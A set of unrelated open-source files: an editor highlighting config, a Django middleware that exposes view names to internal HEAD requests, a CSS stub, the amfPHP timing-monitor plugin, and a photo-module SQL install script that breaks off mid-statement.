C%2B%2B\style68\color=9482384 C%2B%2B\style68\eolfill=false C%2B%2B\style68\font=Consolas, 12, 0, 0, 0 
C%2B%2B\style68\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style68\paper=1536 ; C%2B%2B\style69\color=9474224 C%2B%2B\style69\eolfill=false C%2B%2B\style69\font=Consolas, 12, 1, 0, 0 C%2B%2B\style69\font2=Consolas, 12, 1, 0, 0 C%2B%2B\style69\paper=1536 ; C%2B%2B\style70\color=11571376 C%2B%2B\style70\eolfill=false C%2B%2B\style70\font=Consolas, 12, 0, 0, 0 C%2B%2B\style70\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style70\paper=1536 ; C%2B%2B\style71\color=11571376 C%2B%2B\style71\eolfill=false C%2B%2B\style71\font=Consolas, 12, 0, 0, 0 C%2B%2B\style71\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style71\paper=1536 ; C%2B%2B\style72\color=12632256 C%2B%2B\style72\eolfill=false C%2B%2B\style72\font=Consolas, 12, 0, 0, 0 C%2B%2B\style72\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style72\paper=1536 ; C%2B%2B\style73\color=11579536 C%2B%2B\style73\eolfill=false C%2B%2B\style73\font=Consolas, 12, 0, 0, 0 C%2B%2B\style73\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style73\paper=1536 ; C%2B%2B\style74\color=11579568 C%2B%2B\style74\eolfill=false C%2B%2B\style74\font=Consolas, 12, 1, 0, 0 C%2B%2B\style74\font2=Consolas, 12, 1, 0, 0 C%2B%2B\style74\paper=1536 ; C%2B%2B\style75\color=11579568 C%2B%2B\style75\eolfill=false C%2B%2B\style75\font=Consolas, 12, 0, 0, 0 C%2B%2B\style75\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style75\paper=1536 ; C%2B%2B\style76\color=0 C%2B%2B\style76\eolfill=true C%2B%2B\style76\font=Consolas, 12, 0, 0, 0 C%2B%2B\style76\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style76\paper=14729440 ; C%2B%2B\style77\color=9482384 C%2B%2B\style77\eolfill=true C%2B%2B\style77\font=Consolas, 12, 0, 0, 0 C%2B%2B\style77\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style77\paper=14745568 ; C%2B%2B\style78\color=8367999 C%2B%2B\style78\eolfill=true C%2B%2B\style78\font=Consolas, 12, 0, 0, 0 C%2B%2B\style78\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style78\paper=14741728 ; C%2B%2B\style79\color=12632256 C%2B%2B\style79\eolfill=false C%2B%2B\style79\font=Consolas, 12, 0, 0, 0 C%2B%2B\style79\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style79\paper=1536 ; C%2B%2B\style80\color=12632256 C%2B%2B\style80\eolfill=false C%2B%2B\style80\font=Consolas, 12, 0, 0, 0 C%2B%2B\style80\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style80\paper=1536 ; C%2B%2B\style81\color=12632256 C%2B%2B\style81\eolfill=false C%2B%2B\style81\font=Consolas, 12, 0, 0, 0 C%2B%2B\style81\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style81\paper=1536 ; C%2B%2B\style82\color=12632256 C%2B%2B\style82\eolfill=false C%2B%2B\style82\font=Consolas, 12, 0, 0, 0 C%2B%2B\style82\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style82\paper=1536 ; C%2B%2B\style83\color=11579568 C%2B%2B\style83\eolfill=false C%2B%2B\style83\font=Consolas, 12, 0, 0, 0 C%2B%2B\style83\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style83\paper=1536 ; C%2B%2B\style88\color=12632256 C%2B%2B\style88\eolfill=false C%2B%2B\style88\font=Consolas, 12, 0, 0, 0 C%2B%2B\style88\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style88\paper=1536 ; C%2B%2B\properties\foldatelse=false C%2B%2B\properties\foldcomments=false C%2B%2B\properties\foldcompact=true C%2B%2B\properties\foldpreprocessor=true C%2B%2B\properties\stylepreprocessor=false C%2B%2B\properties\dollars=true C%2B%2B\properties\highlighttriple=false C%2B%2B\properties\highlighthash=false ; C%2B%2B\defaultcolor=16777215 C%2B%2B\defaultpaper=1536 C%2B%2B\defaultfont=Consolas, 12, 0, 0, 0 C%2B%2B\defaultfont2=Consolas, 12, 0, 0, 0 C%2B%2B\autoindentstyle=-1
{ "pile_set_name": "Github" }
from django.conf import settings
from django import http


class XViewMiddleware(object):
    """
    Adds an X-View header to internal HEAD requests -- used by the
    documentation system.
    """

    def process_view(self, request, view_func, view_args, view_kwargs):
        """
        If the request method is HEAD and either the IP is internal or the
        user is a logged-in staff member, quickly return with an x-header
        indicating the view function. This is used by the documentation
        module to lookup the view function for an arbitrary page.
        """
        assert hasattr(request, 'user'), (
            "The XView middleware requires authentication middleware to be "
            "installed. Edit your MIDDLEWARE_CLASSES setting to insert "
            "'django.contrib.auth.middleware.AuthenticationMiddleware'.")
        if request.method == 'HEAD' and (
                request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS or
                (request.user.is_active and request.user.is_staff)):
            response = http.HttpResponse()
            response['X-View'] = "%s.%s" % (view_func.__module__, view_func.__name__)
            return response
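# Editor's note (illustrative, not part of the original middleware): a minimal
# settings sketch showing how this middleware is typically wired up. The dotted
# path below assumes this module is importable as 'django.middleware.doc';
# adjust it to wherever the class actually lives in your project.
#
#   MIDDLEWARE_CLASSES = (
#       'django.contrib.auth.middleware.AuthenticationMiddleware',
#       'django.middleware.doc.XViewMiddleware',
#   )
#   # HEAD requests from these addresses receive the X-View header even when
#   # the requesting user is not a logged-in staff member.
#   INTERNAL_IPS = ('127.0.0.1',)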
{ "pile_set_name": "Github" }
@charset "UTF-8";
/*
 * jQuery File Upload Plugin CSS Example
 * https://github.com/blueimp/jQuery-File-Upload
 *
 * Copyright 2013, Sebastian Tschan
 * https://blueimp.net
 *
 * Licensed under the MIT license:
 * https://opensource.org/licenses/MIT
 */

body {
  padding-top: 60px;
}
{ "pile_set_name": "Github" }
<?php
/**
 * This file is part of amfPHP
 *
 * LICENSE
 *
 * This source file is subject to the license that is bundled
 * with this package in the file license.txt.
 */

/**
 * includes
 */
require_once dirname(__FILE__) . '/AmfphpMonitorService.php';

/**
 * Logs monitoring information, and makes it possible to toggle logging and retrieve
 * the data via the AmfphpMonitorService.
 * If the log file is not writable or its size is larger than maxLogFileSize,
 * logging shall fail silently. This is designed to avoid errors being generated
 * when a developer forgets to turn off monitoring, and to allow the plugin to be
 * enabled by default.
 *
 * The log file is by default at [AmfphpMonitor plugin folder]/log.txt.php
 * To change this, set 'logPath' in the config.
 *
 * note: Logging multiple times with the same name is not possible!
 * @todo maybe change storage mechanism to sqlite. This means checking that it is indeed
 * available, checking if performance is ok etc., so it might be a bit heavy handed.
 *
 * @author Ariel Sommeria-klein
 * @package Amfphp_Plugins_Monitor
 */
class AmfphpMonitor {

    /**
     * path to log file. If it is publicly accessible
     * @var string
     */
    protected $logPath;

    /**
     * service and method name. If there are multiple calls in a request, they are separated with a ', '
     * @var string
     */
    protected $uri;

    /**
     * whether there was an exception during the service call.
     * @todo currently unused.
     * @var boolean
     */
    protected $isException;

    /**
     * last measured time, or start time
     * @var float
     */
    protected static $lastMeasuredTime;

    /**
     * various times. For example ['startD' => 12, 'stopD' => 30]
     * means start of deserialization at 12 ms after the request was received,
     * and end of deserialization 30 ms after start of deserialization.
     * @var array
     */
    protected static $times;

    /**
     * restrict access to amfphp_admin, the role set when using the back office. Default is true.
     * @var boolean
     */
    protected $restrictAccess = true;

    /**
     * The maximum size of the log file, in bytes. Once the log is bigger than this, logging stops.
     * Note that this is not strict, it can overflow with the last log.
     * @var int
     */
    protected $maxLogFileSize = 1000000;

    /**
     * constructor.
     * Manages the log path. If a file exists at the log path, adds hooks for logging.
     * @param array $config
     */
    public function __construct(array $config = null) {
        self::$lastMeasuredTime = round(microtime(true) * 1000);
        self::$times = array();
        $filterManager = Amfphp_Core_FilterManager::getInstance();
        $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_SERVICE_NAMES_2_CLASS_FIND_INFO, $this, 'filterServiceNames2ClassFindInfo');
        if (isset($config['logPath'])) {
            $this->logPath = $config['logPath'];
        } else {
            $this->logPath = dirname(__FILE__) . DIRECTORY_SEPARATOR . 'log.txt.php';
        }
        AmfphpMonitorService::$logPath = $this->logPath;

        if (isset($config['restrictAccess'])) {
            $this->restrictAccess = $config['restrictAccess'];
        }
        AmfphpMonitorService::$restrictAccess = $this->restrictAccess;

        if (isset($config['maxLogFileSize'])) {
            $this->maxLogFileSize = $config['maxLogFileSize'];
        }
        AmfphpMonitorService::$maxLogFileSize = $this->maxLogFileSize;

        if (!is_writable($this->logPath) || !is_readable($this->logPath)) {
            return;
        }
        if (filesize($this->logPath) > $this->maxLogFileSize) {
            return;
        }
        $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_DESERIALIZED_REQUEST, $this, 'filterDeserializedRequest', 0);
        $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_DESERIALIZED_RESPONSE, $this, 'filterDeserializedResponse', 0);
        $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_SERIALIZED_RESPONSE, $this, 'filterSerializedResponse');
    }

    /**
     * Measures the time since the previous call (or the start time if this is the first call),
     * and stores it in the times array.
     * Public and static so that services can call this too to add custom times.
     * Updates lastMeasuredTime.
     * @param string $name
     */
    public static function addTime($name) {
        $now = round(microtime(true) * 1000);
        $timeSinceLastMeasure = $now - self::$lastMeasuredTime;
        self::$times[$name] = $timeSinceLastMeasure;
        self::$lastMeasuredTime = $now;
    }

    /**
     * add monitor service
     * @param array $serviceNames2ClassFindInfo associative array of key -> class find info
     */
    public function filterServiceNames2ClassFindInfo(array $serviceNames2ClassFindInfo) {
        $serviceNames2ClassFindInfo['AmfphpMonitorService'] = new Amfphp_Core_Common_ClassFindInfo(dirname(__FILE__) . '/AmfphpMonitorService.php', 'AmfphpMonitorService');
        return $serviceNames2ClassFindInfo;
    }

    /**
     * Logs the time for the end of deserialization, and grabs the target URIs (service + method).
     * As each request format has its own structure, the code here must handle all deserialized
     * request structures. If a case is not handled, just don't set the target URIs, as the data
     * can still be useful even without them.
     * @param mixed $deserializedRequest
     */
    public function filterDeserializedRequest($deserializedRequest) {
        self::addTime('Deserialization');

        //AMF
        if (is_a($deserializedRequest, 'Amfphp_Core_Amf_Packet')) {
            //detect Flex by looking at first message. assumes that request doesn't mix simple AMF remoting with Flex Messaging
            $isFlex = ($deserializedRequest->messages[0]->targetUri == 'null');
            //target Uri is described in Flex message
            for ($i = 0; $i < count($deserializedRequest->messages); $i++) {
                if ($i > 0) {
                    //add multiple uris split with a ', '
                    $this->uri .= ', ';
                }
                $message = $deserializedRequest->messages[$i];
                if ($isFlex) {
                    $flexMessage = $message->data[0];
                    $explicitTypeField = Amfphp_Core_Amf_Constants::FIELD_EXPLICIT_TYPE;
                    $messageType = $flexMessage->$explicitTypeField;
                    //assumes AmfphpFlexMessaging plugin is installed, which is reasonable given that we're using Flex messaging
                    if ($messageType == AmfphpFlexMessaging::FLEX_TYPE_COMMAND_MESSAGE) {
                        $this->uri .= "Flex Command Message";
                    } else if ($messageType == AmfphpFlexMessaging::FLEX_TYPE_REMOTING_MESSAGE) {
                        $this->uri .= $flexMessage->source . '.' . $flexMessage->operation;
                    } else {
                        $this->uri .= 'Flex ' . $messageType;
                    }
                } else {
                    $this->uri .= $message->targetUri;
                }
            }
        } else if (isset($deserializedRequest->serviceName)) {
            //JSON
            $this->uri = $deserializedRequest->serviceName . '/' . $deserializedRequest->methodName;
        } else if (is_array($deserializedRequest) && isset($deserializedRequest['serviceName'])) {
            //GET, included request
            $this->uri = $deserializedRequest['serviceName'] . '/' . $deserializedRequest['methodName'];
        }
    }

    /**
     * logs the time for the start of serialization
     * @param packet $deserializedResponse
     */
    public function filterDeserializedResponse($deserializedResponse) {
        self::addTime('Service Call');
    }

    /**
     * Logs the time for the end of serialization and writes the log.
     * Ignores calls to Amfphp services (checks for 'Amfphp' at the beginning of the name).
     * Tries to get a lock on the file, and if that fails just drops the log.
     *
     * @param mixed $rawData
     */
    public function filterSerializedResponse($rawData) {
        if (substr($this->uri, 0, 6) == 'Amfphp') {
            return;
        }
        if (filesize($this->logPath) > $this->maxLogFileSize) {
            return;
        }
        self::addTime('Serialization');
        $record = new stdClass();
        $record->uri = $this->uri;
        $record->times = self::$times;
        $fp = fopen($this->logPath, "a");
        if (flock($fp, LOCK_EX)) { // acquire an exclusive lock
            fwrite($fp, "\n" . serialize($record));
            fflush($fp);           // flush output before releasing the lock
            flock($fp, LOCK_UN);   // release the lock
        } else {
            echo "Couldn't get the lock!";
        }
        fclose($fp);
    }

}
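/*
 * Editor's usage sketch (illustrative, not part of the original plugin file).
 * Because addTime() is public and static, a service method can record its own
 * checkpoints, which end up in the logged times array next to the built-in
 * 'Deserialization', 'Service Call' and 'Serialization' entries. The service
 * class and method names below are hypothetical.
 *
 * class MyDataService {
 *     public function heavyQuery() {
 *         // ... expensive work ...
 *         AmfphpMonitor::addTime('MyDataService.heavyQuery');
 *         return 'done';
 *     }
 * }
 */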
{ "pile_set_name": "Github" }
-- SETTINGS SET @iTypeOrder = (SELECT MAX(`order`) FROM `sys_options_types` WHERE `group` = 'modules'); INSERT INTO `sys_options_types`(`group`, `name`, `caption`, `icon`, `order`) VALUES ('modules', 'bx_photos', '_bx_photos', 'bx_photos@modules/boonex/photos/|std-icon.svg', IF(ISNULL(@iTypeOrder), 1, @iTypeOrder + 1)); SET @iTypeId = LAST_INSERT_ID(); INSERT INTO `sys_options_categories` (`type_id`, `name`, `caption`, `order`) VALUES (@iTypeId, 'bx_photos', '_bx_photos', 1); SET @iCategId = LAST_INSERT_ID(); INSERT INTO `sys_options` (`name`, `value`, `category_id`, `caption`, `type`, `check`, `check_error`, `extra`, `order`) VALUES ('bx_photos_summary_chars', '700', @iCategId, '_bx_photos_option_summary_chars', 'digit', '', '', '', 1), ('bx_photos_plain_summary_chars', '240', @iCategId, '_bx_photos_option_plain_summary_chars', 'digit', '', '', '', 2), ('bx_photos_per_page_browse', '12', @iCategId, '_bx_photos_option_per_page_browse', 'digit', '', '', '', 10), ('bx_photos_per_page_profile', '6', @iCategId, '_bx_photos_option_per_page_profile', 'digit', '', '', '', 12), ('bx_photos_per_page_browse_showcase', '32', @iCategId, '_sys_option_per_page_browse_showcase', 'digit', '', '', '', 15), ('bx_photos_rss_num', '10', @iCategId, '_bx_photos_option_rss_num', 'digit', '', '', '', 20), ('bx_photos_searchable_fields', 'title,text', @iCategId, '_bx_photos_option_searchable_fields', 'list', '', '', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:21:"get_searchable_fields";}', 30); -- PAGE: create entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_create_entry', '_bx_photos_page_title_sys_create_entry', '_bx_photos_page_title_create_entry', 'bx_photos', 5, 2147483647, 1, 'create-photo', 'page.php?i=create-photo', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_create_entry', 1, 'bx_photos', '_bx_photos_page_block_title_create_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_create";}', 0, 1, 1); -- PAGE: edit entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_edit_entry', '_bx_photos_page_title_sys_edit_entry', '_bx_photos_page_title_edit_entry', 'bx_photos', 5, 2147483647, 1, 'edit-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_edit_entry', 1, 'bx_photos', '_bx_photos_page_block_title_edit_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_edit";}', 0, 0, 0); -- PAGE: delete entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, 
`visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_delete_entry', '_bx_photos_page_title_sys_delete_entry', '_bx_photos_page_title_delete_entry', 'bx_photos', 5, 2147483647, 1, 'delete-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_delete_entry', 1, 'bx_photos', '_bx_photos_page_block_title_delete_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_delete";}', 0, 0, 0); -- PAGE: view entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry', '_bx_photos_page_title_sys_view_entry', '_bx_photos_page_title_view_entry', 'bx_photos', 12, 2147483647, 1, 'view-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_view_entry', 1, 'bx_photos', '', '_bx_photos_page_block_title_entry_photo', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_photo_block";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_text', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:17:"entity_text_block";}', 0, 0, 1, 1), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_author', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_author";}', 0, 0, 1, 3), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_rating', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_rating";}', 0, 0, 0, 0), ('bx_photos_view_entry', 3, 'bx_photos', '_bx_photos_page_block_title_sys_entry_context', '_bx_photos_page_block_title_entry_context', 13, 2147483647, 'service', 'a:2:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"entity_context\";}', 0, 0, 1, 1), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_info', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_info";}', 0, 0, 1, 2), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_location', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_location";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_all_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_all_actions";}', 0, 0, 1, 2), ('bx_photos_view_entry', 4, 'bx_photos', '', '_bx_photos_page_block_title_entry_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"entity_actions";}', 0, 0, 0, 0), ('bx_photos_view_entry', 4, 'bx_photos', '', 
'_bx_photos_page_block_title_entry_social_sharing', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:21:"entity_social_sharing";}', 0, 0, 0, 0), ('bx_photos_view_entry', 4, 'bx_photos', '', '_bx_photos_page_block_title_entry_attachments', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_attachments";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_comments', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_comments";}', 0, 0, 1, 4), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_location', 3, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:13:"locations_map";s:6:"params";a:2:{i:0;s:9:"bx_photos";i:1;s:4:"{id}";}s:5:"class";s:20:"TemplServiceMetatags";}', 0, 0, 1, 3), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 0, 1, 4); -- PAGE: view entry "brief" INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry_brief', '_bx_photos_page_title_sys_view_entry_brief', '_bx_photos_page_title_view_entry_brief', 'bx_photos', 2, 2147483647, 1, 'quick-view-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntryBrief', 'modules/boonex/photos/classes/BxPhotosPageEntryBrief.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_view_entry_brief', 1, 'bx_photos', '', '_bx_photos_page_block_title_entry_photo', 0, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:27:"entity_photo_switcher_block";}', 0, 0, 1, 1), ('bx_photos_view_entry_brief', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_info', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_info";}', 0, 0, 1, 1), ('bx_photos_view_entry_brief', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_author', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_author";}', 0, 0, 1, 2); -- PAGE: view entry comments INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry_comments', '_bx_photos_page_title_sys_view_entry_comments', '_bx_photos_page_title_view_entry_comments', 'bx_photos', 5, 2147483647, 1, 'view-photo-comments', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_view_entry_comments', 1, 'bx_photos', '_bx_photos_page_block_title_entry_comments', '_bx_photos_page_block_title_entry_comments_link', 11, 2147483647, 
'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_comments";}', 0, 0, 1); -- PAGE: popular entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_popular', '_bx_photos_page_title_sys_entries_popular', '_bx_photos_page_title_entries_popular', 'bx_photos', 5, 2147483647, 1, 'photos-popular', 'page.php?i=photos-popular', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_popular', 1, 'bx_photos', '_bx_photos_page_block_title_popular_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:3:{s:9:"unit_view";s:7:"gallery";s:13:"empty_message";b:1;s:13:"ajax_paginate";b:0;}}', 0, 1, 1); -- PAGE: recently updated entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_updated', '_bx_photos_page_title_sys_entries_updated', '_bx_photos_page_title_entries_updated', 'bx_photos', 5, 2147483647, 1, 'photos-updated', 'page.php?i=photos-updated', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_updated', 1, 'bx_photos', '_bx_photos_page_block_title_updated_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_updated";s:6:"params";a:3:{s:9:"unit_view";s:7:"gallery";s:13:"empty_message";b:1;s:13:"ajax_paginate";b:0;}}', 0, 1, 1); -- PAGE: entries of author INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_author', 'photos-author', '_bx_photos_page_title_sys_entries_of_author', '_bx_photos_page_title_entries_of_author', 'bx_photos', 5, 2147483647, 1, '', '', '', '', 0, 1, 0, 'BxPhotosPageAuthor', 'modules/boonex/photos/classes/BxPhotosPageAuthor.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_author', 1, 'bx_photos', '', '_bx_photos_page_block_title_entries_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"my_entries_actions";}', 0, 0, 1, 1), ('bx_photos_author', 1, 'bx_photos', '_bx_photos_page_block_title_sys_favorites_of_author', '_bx_photos_page_block_title_favorites_of_author', 11, 2147483647, 'service', 
'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_favorite";s:6:"params";a:1:{i:0;s:12:"{profile_id}";}}', 0, 1, 1, 2), ('bx_photos_author', 1, 'bx_photos', '_bx_photos_page_block_title_sys_entries_of_author', '_bx_photos_page_block_title_entries_of_author', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_author";}', 0, 0, 1, 3); -- PAGE: entries in context INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_context', 'photos-context', '_bx_photos_page_title_sys_entries_in_context', '_bx_photos_page_title_entries_in_context', 'bx_photos', 5, 2147483647, 1, '', '', '', '', 0, 1, 0, 'BxPhotosPageAuthor', 'modules/boonex/photos/classes/BxPhotosPageAuthor.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_context', 1, 'bx_photos', '_bx_photos_page_block_title_sys_entries_in_context', '_bx_photos_page_block_title_entries_in_context', 11, 2147483647, 'service', 'a:2:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"browse_context\";}', 0, 0, 1, 1); -- PAGE: module home INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_home', 'photos-home', '_bx_photos_page_title_sys_home', 